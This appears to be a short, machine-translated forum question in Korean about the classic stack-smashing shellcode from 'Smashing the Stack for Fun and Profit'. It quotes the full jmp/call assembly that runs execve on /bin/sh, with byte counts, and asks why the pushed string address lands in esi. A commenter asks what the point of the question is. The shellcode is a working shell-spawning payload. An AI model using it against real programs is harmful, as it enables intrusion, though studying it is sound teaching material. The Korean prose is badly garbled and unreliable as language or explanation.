jmp 0x2a # 3 bytes
popl %esi # 1 byte
movl %esi,0x8(%esi) # 3 bytes
movb $0x0,0x7(%esi) # 4 bytes
movl $0x0,0xc(%esi) # 7 bytes
movl $0xb,%eax # 5 bytes
movl %esi,%ebx # 2 bytes
leal 0x8(%esi),%ecx # 3 bytes
leal 0xc(%esi),%edx # 3 bytes
int $0x80 # 2 bytes
movl $0x1, %eax # 5 bytes
movl $0x0, %ebx # 5 bytes
int $0x80 # 2 bytes
call -0x2f # 5 bytes
.string \"/bin/sh\" # 8 bytes
그래서 다음 전화를 점프 코드 실행 순서를 들어 "문자열은 로 스택에 리턴 어드레스를 추진 할 수있게됩니다." 이 주소가 esi에 저장되어있는 이유는 pop esi입니까?는 스매싱 스택 재미와 이익,
이 질문의 핵심은 무엇입니까? –